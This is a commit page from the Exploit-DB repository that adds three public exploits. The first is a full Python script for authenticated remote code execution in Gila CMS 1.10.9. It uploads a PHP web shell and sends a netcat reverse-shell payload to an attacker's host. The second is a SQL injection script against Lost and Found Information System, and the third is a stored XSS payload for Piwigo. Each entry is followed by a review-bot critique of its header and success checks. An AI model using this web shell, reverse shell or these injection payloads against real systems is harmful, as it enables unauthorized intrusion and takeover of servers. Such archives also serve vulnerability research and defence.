4 changes to exploits/shellcodes/ghdb Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated) Lost and Found Information System v1.0 - SQL Injection Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)
Exploit-DB
committed
Jul 7, 2023
1 parent
9461677
commit e2ea5c0
Showing
4 changed files
with
142 additions
and
0 deletions.
@@ -0,0 +1,100 @@ | ||
# Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated) | ||
# Date: 05-07-2023 | ||
# Exploit Author: Omer Shaik (unknown_exploit) | ||
# Vendor Homepage: https://gilacms.com/ | ||
# Software Link: https://github.com/GilaCMS/gila/ | ||
# Version: Gila 1.10.9 | ||
# Tested on: Linux | ||
|
||
import requests | ||
from termcolor import colored | ||
from urllib.parse import urlparse | ||
|
||
# Print ASCII art | ||
ascii_art = """ | ||
██████╗ ██╗██╗ █████╗ ██████╗███╗ ███╗███████╗ ██████╗ ██████╗███████╗ | ||
██╔════╝ ██║██║ ██╔══██╗ ██╔════╝████╗ ████║██╔════╝ ██╔══██╗██╔════╝██╔════╝ | ||
██║ ███╗██║██║ ███████║ ██║ ██╔████╔██║███████╗ ██████╔╝██║ █████╗ | ||
██║ ██║██║██║ ██╔══██║ ██║ ██║╚██╔╝██║╚════██║ ██╔══██╗██║ ██╔══╝ | ||
╚██████╔╝██║███████╗██║ ██║ ╚██████╗██║ ╚═╝ ██║███████║ ██║ ██║╚██████╗███████╗ | ||
╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝ | ||
by Unknown_Exploit | ||
""" | ||
|
||
print(colored(ascii_art, "green")) | ||
|
||
# Prompt user for target URL | ||
target_url = input("Enter the target login URL (e.g., http://example.com/admin/): ") | ||
|
||
# Extract domain from target URL | ||
parsed_url = urlparse(target_url) | ||
domain = parsed_url.netloc | ||
target_url_2 = f"http://{domain}/" | ||
|
||
# Prompt user for login credentials | ||
username = input("Enter the email: ") | ||
password = input("Enter the password: ") | ||
|
||
# Create a session and perform login | ||
session = requests.Session() | ||
login_payload = { | ||
'action': 'login', | ||
'username': username, | ||
'password': password | ||
} | ||
response = session.post(target_url, data=login_payload) | ||
cookie = response.cookies.get_dict() | ||
var1 = cookie['PHPSESSID'] | ||
var2 = cookie['GSESSIONID'] | ||
|
||
# Prompt user for local IP and port | ||
lhost = input("Enter the local IP (LHOST): ") | ||
lport = input("Enter the local port (LPORT): ") | ||
|
||
# Construct the payload | ||
payload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f" | ||
payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}" | ||
|
||
# Perform file upload using POST request | ||
upload_url = f"{target_url_2}fm/upload" | ||
upload_headers = { | ||
"Host": domain, | ||
"Content-Length": "424", | ||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", | ||
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2", | ||
"Accept": "*/*", | ||
"Origin": target_url_2, | ||
"Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess", | ||
"Accept-Encoding": "gzip, deflate", | ||
"Accept-Language": "en-US,en;q=0.9", | ||
"Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}", | ||
"Connection": "close" | ||
} | ||
upload_data = f''' | ||
------WebKitFormBoundarynKy5BIIJQcZC80i2 | ||
Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7" | ||
Content-Type: application/x-php | ||
<?php system($_GET["cmd"]);?> | ||
------WebKitFormBoundarynKy5BIIJQcZC80i2 | ||
Content-Disposition: form-data; name="path" | ||
tmp | ||
------WebKitFormBoundarynKy5BIIJQcZC80i2 | ||
Content-Disposition: form-data; name="g_response" | ||
content | ||
------WebKitFormBoundarynKy5BIIJQcZC80i2-- | ||
''' | ||
|
||
upload_response = session.post(upload_url, headers=upload_headers, data=upload_data) | ||
|
||
if upload_response.status_code == 200: | ||
print("File uploaded successfully.") | ||
# Execute payload | ||
response = session.get(payload_url) | ||
print("Payload executed successfully.") | ||
else: | ||
print("Error uploading the file:", upload_response.text) |
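Review bot: The header (the `# Exploit Title` … `# Tested on` lines) does not say what role the "Authenticated" user must hold or which component is vulnerable, so anyone triaging this entry has to reconstruct it from the request bodies; the upload is posted to `fm/upload` with `path` set to `tmp` and the Referer points at `admin/fm`, which suggests the admin file manager, and a header line such as `# Vulnerable component: file manager upload (fm/upload) storing a .php7 file under a web-served tmp/ directory — confirm the role required` would make that explicit. The success reporting at the end is not backed by any check: the `session.get(payload_url)` response is assigned and never inspected, so `Payload executed successfully.` is printed even on a 404, and the upload branch treats any 200 as success although the file manager could answer 200 with an error body. For defenders, the request shape that is already visible here — a multipart POST to `fm/upload` carrying a `.php7` filename, followed by a GET to `tmp/shell.php7?cmd=` — is the indicator worth recording in the header. No `# CVE` line is present; the sibling entries in this commit carry one (`# CVE : N/A` when none is assigned).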
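--- a/<file-path-not-shown-on-page>
+++ b/<file-path-not-shown-on-page>
@@ -0,0 +1,24 @@
+# Exploit Title: Lost and Found Information System v1.0 - SQL Injection
+# Date: 2023-06-30
+# country: Iran
+# Exploit Author: Amirhossein Bahramizadeh
+# Category : webapps
+# Dork : /php-lfis/admin/?page=system_info/contact_information
+# Tested on: Windows/Linux
+# CVE : CVE-2023-33592
+import requests
+
+# URL of the vulnerable component
+url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"
+
+# Injecting a SQL query to exploit the vulnerability
+payload = "' OR 1=1 -- "
+
+# Send the request with the injected payload
+response = requests.get(url + payload)
+
+# Check if the SQL injection was successful
+if "admin" in response.text:
+    print("SQL injection successful!")
+else:
+    print("SQL injection failed.")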
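Review bot: The result check `if "admin" in response.text:` is not evidence of injection: the request goes to a page under `/admin/`, whose response is likely to contain that word in its own markup or login form, so the script will print `SQL injection successful!` against an unaffected target as well, and `url` is a hard-coded `example.com` placeholder with no argument handling, so as committed this is a template rather than a runnable check. The header also omits which parameter is injectable; from the code the payload is concatenated onto the `page` query parameter, and a line such as `# Injection point: 'page' GET parameter of /admin/?page=system_info/contact_information` would record that. Whether the endpoint requires an authenticated admin session is not stated either, although the `/admin/` path suggests it and the title carries no "(Authenticated)" tag — worth confirming and documenting.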
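--- a/<file-path-not-shown-on-page>
+++ b/<file-path-not-shown-on-page>
@@ -0,0 +1,15 @@
+#Exploit Title: Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)
+#Date: 25 June 2023
+#Exploit Author: Okan Kurtulus
+#Vendor Homepage: https://piwigo.org
+#Version: 13.7.0
+#Tested on: Ubuntu 22.04
+#CVE : N/A
+
+# Proof of Concept:
+1– Install the system through the website and log in with any user authorized to upload photos.
+2– Click "Add" under "Photos" from the left menu. The photo you want to upload is selected and uploaded.
+3– Click on the uploaded photo and the photo editing screen opens. XSS payload is entered in the "Description" section on this screen. After saving the file, go to the homepage and open the page with the photo. The XSS payload appears to be triggered.
+
+#Payload
+<sCriPt>alert(1);</sCriPt>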
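Review bot: The header lacks a `#Software Link:` line and any note of a fixed version, and the required privilege is only given in step 1 of the proof of concept ("any user authorized to upload photos") while the title says only Authenticated; the Gila CMS entry in this commit records a software link, so a `#Software Link:` line and a `#Privileges required: user with photo-upload permission` line would bring this entry in line with it. The injection point is the photo "Description" field named in step 3; stating that field in the header as well would save readers from parsing the prose. Where the stored value is rendered (step 3 says the photo's page on the homepage) is the place a maintainer would check for missing output encoding, so keeping that detail in the header rather than only in the steps helps triage.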